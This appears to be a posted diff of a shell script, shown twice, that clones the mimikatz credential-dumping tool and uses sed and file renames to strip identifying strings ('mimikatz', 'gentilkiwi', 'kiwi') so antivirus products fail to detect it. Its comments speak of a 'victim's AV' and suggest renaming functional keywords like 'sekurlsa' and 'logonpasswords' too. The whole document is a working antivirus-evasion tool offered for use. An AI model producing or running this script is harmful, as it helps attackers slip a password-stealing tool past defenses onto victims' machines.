imaibou · June 24, 2025 11:18
diff --git a/mimikatz_obfuscator.sh b/mimikatz_obfuscator.sh
 # This script downloads and slightly "obfuscates" the mimikatz project.
 # Most AV solutions block mimikatz based on certain keywords in the binary like "mimikatz", "gentilkiwi", "[email protected]" ..., 
 # so removing them from the project before compiling gets us past most of the AV solutions.
 # We can even go further and change some functionality keywords like "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth" ....,
 # but this needs adapting to the doc, so it has not been done, try it if your victim's AV still detects mimikatz after this program.
 # I replaced "mimikatz" by "kartoffel" (no, I'm not germain), I recommand you change that so that Kartoffel doesn't get flaged by AVs.

 git clone https://github.com/gentilkiwi/mimikatz.git kartoffel
 mv kartoffel/mimikatz kartoffel/kartoffel
 find kartoffel/ -type f -print0 | xargs -0 sed -i 's/mimikatz/kartoffel/g'
 find kartoffel/ -type f -print0 | xargs -0 sed -i 's/MIMIKATZ/KARTOFFEL/g'
 find kartoffel/ -type f -print0 | xargs -0 sed -i 's/Mimikatz/Kartoffel/g'
 find kartoffel/ -type f -print0 | xargs -0 sed -i 's/DELPY/DOE/g'
 find kartoffel/ -type f -print0 | xargs -0 sed -i 's/Benjamin/John/g'
 find kartoffel/ -type f -print0 | xargs -0 sed -i 's/[email protected]/[email protected]/g'
 find kartoffel/ -type f -print0 | xargs -0 sed -i 's/creativecommons/python/g'
 find kartoffel/ -type f -print0 | xargs -0 sed -i 's/gentilkiwi/hoyhayhay/g'
 find kartoffel/ -type f -print0 | xargs -0 sed -i 's/KIWI/MANGO/g'
 find kartoffel/ -type f -print0 | xargs -0 sed -i 's/Kiwi/Mango/g'
 find kartoffel/ -type f -print0 | xargs -0 sed -i 's/kiwi/mango/g'
 find kartoffel/ -type f -name '*mimikatz*' | while read FILE ; do
 	newfile="$(echo ${FILE} |sed -e 's/mimikatz/kartoffel/g')";
 	mv "${FILE}" "${newfile}";
 done
 find kartoffel/ -type f -name '*kiwi*' | while read FILE ; do
 	newfile="$(echo ${FILE} |sed -e 's/kiwi/mango/g')";
 	mv "${FILE}" "${newfile}";
 done
	# This script downloads and slightly "obfuscates" the mimikatz project.
	# Most AV solutions block mimikatz based on certain keywords in the binary like "mimikatz", "gentilkiwi", "[email protected]" ...,
	# so removing them from the project before compiling gets us past most of the AV solutions.
	# We can even go further and change some functionality keywords like "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth" ....,
	# but this needs adapting to the doc, so it has not been done, try it if your victim's AV still detects mimikatz after this program.
	# I replaced "mimikatz" by "kartoffel" (no, I'm not germain), I recommand you change that so that Kartoffel doesn't get flaged by AVs.

	git clone https://github.com/gentilkiwi/mimikatz.git kartoffel
	mv kartoffel/mimikatz kartoffel/kartoffel
	find kartoffel/ -type f -print0 \| xargs -0 sed -i 's/mimikatz/kartoffel/g'
	find kartoffel/ -type f -print0 \| xargs -0 sed -i 's/MIMIKATZ/KARTOFFEL/g'
	find kartoffel/ -type f -print0 \| xargs -0 sed -i 's/Mimikatz/Kartoffel/g'
	find kartoffel/ -type f -print0 \| xargs -0 sed -i 's/DELPY/DOE/g'
	find kartoffel/ -type f -print0 \| xargs -0 sed -i 's/Benjamin/John/g'
	find kartoffel/ -type f -print0 \| xargs -0 sed -i 's/[email protected]/[email protected]/g'
	find kartoffel/ -type f -print0 \| xargs -0 sed -i 's/creativecommons/python/g'
	find kartoffel/ -type f -print0 \| xargs -0 sed -i 's/gentilkiwi/hoyhayhay/g'
	find kartoffel/ -type f -print0 \| xargs -0 sed -i 's/KIWI/MANGO/g'
	find kartoffel/ -type f -print0 \| xargs -0 sed -i 's/Kiwi/Mango/g'
	find kartoffel/ -type f -print0 \| xargs -0 sed -i 's/kiwi/mango/g'
	find kartoffel/ -type f -name 'mimikatz' \| while read FILE ; do
	newfile="$(echo ${FILE} \|sed -e 's/mimikatz/kartoffel/g')";
	mv "${FILE}" "${newfile}";
	done
	find kartoffel/ -type f -name 'kiwi' \| while read FILE ; do
	newfile="$(echo ${FILE} \|sed -e 's/kiwi/mango/g')";
	mv "${FILE}" "${newfile}";
	done